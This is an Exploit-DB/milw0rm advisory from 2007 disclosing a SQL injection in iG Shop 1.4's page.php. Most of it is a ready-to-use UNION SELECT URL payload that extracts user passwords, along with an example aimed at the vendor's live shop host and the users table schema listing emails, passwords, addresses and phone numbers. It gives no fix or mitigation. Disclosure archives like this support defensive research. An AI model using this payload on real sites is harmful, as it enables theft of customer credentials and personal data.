iG Shop 1.4 - 'page.php' SQL Injection

EDB-ID:

3907


Author:

gsy

Type:

webapps


Platform:

PHP

Date:

2007-05-12


Discovered by: gsy & kerem125
Website: www.kerem125.com

Script Download: http://www.igeneric.co.uk/ig-shopping-cart.html

exploit:/shop/page.php?page_type=catalog_navigate&type_id[]=-99%20union/**/select/**/password/**/from/**/users/*

example:http://shop.igeneric.co.uk/shop/page.php?page_type=catalog_navigate&type_id[]=-99%20union/**/select/**/password/**/from/**/users/*

contact: by_gsy@hotmail.com & kerem125@kerem125.com
Special thx to:by_emr3 , ercu_145, bolivar, voltigore, f10

# user_id int(11) NOT NULL auto_increment,
# fname varchar(50) NOT NULL default '',
# lname varchar(50) NOT NULL default '',
# email varchar(100) NOT NULL default '',
# password varchar(100) NOT NULL default '',
# salutation varchar(5) NOT NULL default '',
# bill_address varchar(200) NOT NULL default '',
# bill_address_2 varchar(100) NOT NULL default '',
# bill_city varchar(50) NOT NULL default '',
# bill_post_code varchar(15) NOT NULL default '',
# bill_country varchar(20) NOT NULL default '',
# bill_phone varchar(15) NOT NULL default '',
# ship_address varchar(200) NOT NULL default '',
# ship_address_2 varchar(100) NOT NULL default '',
# ship_city varchar(50) NOT NULL default '',
# ship_post_code varchar(15) NOT NULL default '',
# ship_country varchar(20) NOT NULL default '',
# ship_phone varchar(15) NOT NULL default '',

# milw0rm.com [2007-05-12]